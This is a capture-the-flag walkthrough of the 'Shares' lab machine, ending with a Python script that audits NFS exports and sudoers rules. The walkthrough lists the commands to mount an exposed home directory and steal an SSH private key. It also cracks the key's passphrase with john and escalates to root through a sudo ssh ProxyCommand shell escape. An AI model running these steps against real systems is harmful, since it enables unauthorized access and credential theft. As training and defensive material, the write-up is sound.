# Shares

## nmap

```
mkdir nmap
sudo rustscan -a 172.31.1.7 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan
```

## Enumeration

An NFS share is exposed on port 2049, and SSH is, oddly, listening on port 27853.

<div align="left"><img src="/files/-Mj9PjLyzsPthATmZCHh" alt=""></div>

It looks like we can mount the home folder of user `amir`.

<div align="left"><img src="/files/-Mj9QF_6pp-ePJO9AIz6" alt=""></div>

We can mount it by executing the following:

```
mkdir /tmp/amir
sudo mount -t nfs 172.31.1.7:/home/amir /tmp/amir
```

Digging through the file system, you will notice an SSH private key inside the `.ssh` folder.

<div align="left"><img src="/files/-Mj9R-dRtPm3Svsdx7TA" alt=""></div>

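Copy `id_rsa` to your working directory, and `chmod` it so that only your user can read it.

```
# from /tmp/amir/.ssh
cp id_rsa ~/infosec/cyberseclabs/shares/amir_id_rsa
cd ~/infosec/cyberseclabs/shares
chmod 600 amir_id_rsa   # ssh rejects private keys readable by other users
```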

The SSH key is encrypted, which means we have to crack its passphrase with `john`.

<div align="left"><img src="/files/-Mj9RU45E8AQpn2jBgDs" alt=""></div>

```
ssh2john amir_id_rsa > amir_id_rsa.ssh2john
john amir_id_rsa.ssh2john -w=/opt/wordlist/rockyou.txt
```

After a few seconds, you will be able to get the password.

## Initial foothold

With the SSH key, the cracked password, and the knowledge that user `amir` exists, we can now log in. Sweet :D

<div align="left"><img src="/files/-Mj9SYnMDFLqDYdOZQgj" alt=""></div>

## Privilege Escalation

We can execute `python3` as user `amy`.

<div align="left"><img src="/files/-Mj9SudTakcz9H71XTja" alt=""></div>

We can leverage that to gain a shell as `amy`.

<div align="left"><img src="/files/-Mj9THQuLoSo1oVxSEgy" alt=""></div>

And as user `amy`, we can run `ssh` with `sudo`.

<div align="left"><img src="/files/-Mj9TXBU3sV6XgClGps_" alt=""></div>

Now we can gain root by executing the following:

```
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
```

Enjoy your root privilege. :D

<div align="left"><img src="/files/-Mj9Tsus42BUlzd2VNYC" alt=""></div>
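Seen from the defender's side, every step above comes down to two configuration files: `/etc/exports` (the home directory was mountable) and the sudoers rules (`python3` as `amy`, `ssh` as root). The audit below is an added example, not part of the original write-up; the sample file contents and the function names are constructed assumptions, and the parser does not resolve sudoers aliases or `!` negations.

```python
import re

# Binaries the write-up abuses through sudo; a real audit would use a longer list.
SHELL_CAPABLE = {"python3", "ssh"}
RULE = re.compile(r"^(\S+)\s+\S+=\s*\(([^)]*)\)\s*(?:NOPASSWD:\s*)?(.+)$")

# Constructed samples (assumed; the page does not show the target's real files).
SAMPLE_EXPORTS = """\
/home/amir *(rw,sync,no_subtree_check)
/srv/pub 10.0.0.0/24(ro,root_squash)
"""
SAMPLE_SUDOERS = """\
Defaults env_reset
amir ALL=(amy) NOPASSWD: /usr/bin/python3
amy ALL=(root) NOPASSWD: /usr/bin/ssh
ops ALL=(root) /usr/sbin/reboot
"""

def audit_exports(text):
    """Flag exports of home directories, open client specs and no_root_squash."""
    findings = []
    for line in text.splitlines():
        fields = line.split("#", 1)[0].split()
        if not fields:
            continue
        path, clients = fields[0], fields[1:] or ["*"]  # no client = everyone
        if path == "/home" or path.startswith("/home/"):
            findings.append((path, "home directory exported"))
        for client in clients:
            host, _, opts = client.partition("(")
            if host in ("", "*"):
                findings.append((path, "open to any client"))
            if "no_root_squash" in opts.rstrip(")").split(","):
                findings.append((path, "no_root_squash set"))
    return findings

def audit_sudoers(text):
    """Return (user, run-as, binary) for rules granting a shell-capable binary."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line.split("#", 1)[0].strip())
        for cmd in (m.group(3).split(",") if m else []):
            name = (cmd.split() or [""])[0].rsplit("/", 1)[-1]
            if name in SHELL_CAPABLE:
                findings.append((m.group(1), m.group(2), name))
    return findings

if __name__ == "__main__":
    print(audit_exports(SAMPLE_EXPORTS), audit_sudoers(SAMPLE_SUDOERS))
```

On a real host, pass the contents of `/etc/exports` and the sudoers files to the two functions in place of the samples.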

